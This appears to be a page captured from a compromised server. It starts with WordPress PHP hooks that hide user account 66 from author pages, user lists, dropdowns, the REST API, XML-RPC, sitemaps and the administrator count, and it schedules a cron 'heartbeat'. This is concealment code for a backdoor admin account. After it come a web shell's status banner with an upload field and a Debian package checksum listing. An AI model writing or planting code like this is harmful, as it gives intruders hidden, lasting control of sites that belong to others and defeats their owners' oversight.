add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
ea314cc3717d1618e13c711c876635a7 usr/lib/python3/dist-packages/html5lib-1.1.egg-info/PKG-INFO 68b329da9893e34099c7d8ad5cb9c940 usr/lib/python3/dist-packages/html5lib-1.1.egg-info/dependency_links.txt bfcf126996952acacaf1847259ca9ef3 usr/lib/python3/dist-packages/html5lib-1.1.egg-info/requires.txt d698a761bfd3ab83931c3534520141a2 usr/lib/python3/dist-packages/html5lib-1.1.egg-info/top_level.txt cf4ec786468155f39b3a70f9bf965e84 usr/lib/python3/dist-packages/html5lib/__init__.py bcd46c53b9c35cf29809f84e96edb11f usr/lib/python3/dist-packages/html5lib/_ihatexml.py f92d3b7f93388f2fdeeb1dafb7f67388 usr/lib/python3/dist-packages/html5lib/_inputstream.py 0cdac0992cfb7f922d08de3fce20a7be usr/lib/python3/dist-packages/html5lib/_tokenizer.py fd435dcbe13ff2bcfc45ee6e4e7e8ffd usr/lib/python3/dist-packages/html5lib/_trie/__init__.py 80641168d1a81191f71f7b52ad766e4d usr/lib/python3/dist-packages/html5lib/_trie/_base.py 9cbe2c53796af64ed20c760c7fb18328 usr/lib/python3/dist-packages/html5lib/_trie/py.py ee9158bd2bf0c879818233c45aff3391 usr/lib/python3/dist-packages/html5lib/_utils.py 3764c67dfeaaa7d1b53aa02ee0d57a38 usr/lib/python3/dist-packages/html5lib/constants.py d41d8cd98f00b204e9800998ecf8427e usr/lib/python3/dist-packages/html5lib/filters/__init__.py a65b5511ec9aeaa84c109a9e81532a95 usr/lib/python3/dist-packages/html5lib/filters/alphabeticalattributes.py 171e133cd9c56ba65698eb052cb4c1ca usr/lib/python3/dist-packages/html5lib/filters/base.py ae9c2e839c8f2cd3f724d77aa710ba7b usr/lib/python3/dist-packages/html5lib/filters/inject_meta_charset.py 256057bd88e6dff7658f0e329af5d8e5 usr/lib/python3/dist-packages/html5lib/filters/lint.py a86748388fdc0548c06d8b3251fbda10 usr/lib/python3/dist-packages/html5lib/filters/optionaltags.py 18f714b4dfd0179db62d81687ac5ab01 usr/lib/python3/dist-packages/html5lib/filters/sanitizer.py 6688eab6822f3bd2797f49474abddd58 usr/lib/python3/dist-packages/html5lib/filters/whitespace.py 0e008fe05dfc1cbc05b82bdeb416e956 usr/lib/python3/dist-packages/html5lib/html5parser.py 828a7c101179a2e63294b49ce165dcab usr/lib/python3/dist-packages/html5lib/serializer.py a6787e69b8b62f98295e3f4e302aaa76 usr/lib/python3/dist-packages/html5lib/treeadapters/__init__.py fcc1790559e135bd3f83165546240fb2 usr/lib/python3/dist-packages/html5lib/treeadapters/genshi.py 8b9c528d54d72d0bf26169d9726529fb usr/lib/python3/dist-packages/html5lib/treeadapters/sax.py 66ac5370fb51d145e3d46911f97afcfc usr/lib/python3/dist-packages/html5lib/treebuilders/__init__.py 247bec7d02837c6351d74677573bf378 usr/lib/python3/dist-packages/html5lib/treebuilders/base.py d625524c304d922795a322dde1903cdc usr/lib/python3/dist-packages/html5lib/treebuilders/dom.py 1c02b59707e94775f8b5133aca05bdde usr/lib/python3/dist-packages/html5lib/treebuilders/etree.py a4a9b192986f0cbb2abbbab0e08fdb5d usr/lib/python3/dist-packages/html5lib/treebuilders/etree_lxml.py 1289ee9c9c31d14b9a7325b6aff33724 usr/lib/python3/dist-packages/html5lib/treewalkers/__init__.py 34cb345cd7c4568b97a08a535bdf26e8 usr/lib/python3/dist-packages/html5lib/treewalkers/base.py a2e767cae5605e0cfafc67987e3920bc usr/lib/python3/dist-packages/html5lib/treewalkers/dom.py 0dd1d512585b43081f9216a72fdda349 usr/lib/python3/dist-packages/html5lib/treewalkers/etree.py 539e6364a578648bb05de343eda86c10 usr/lib/python3/dist-packages/html5lib/treewalkers/etree_lxml.py 063ddcc9ecb565245453627265f44641 usr/lib/python3/dist-packages/html5lib/treewalkers/genshi.py 897b87869c3bdba2e10538e30fae9706 usr/share/doc/python3-html5lib/README.rst.gz e4acebe0eb4764f1899dd8511930e2b9 usr/share/doc/python3-html5lib/changelog.Debian.gz eacad2fc4900d1ebe72528adc7874ad8 usr/share/doc/python3-html5lib/copyright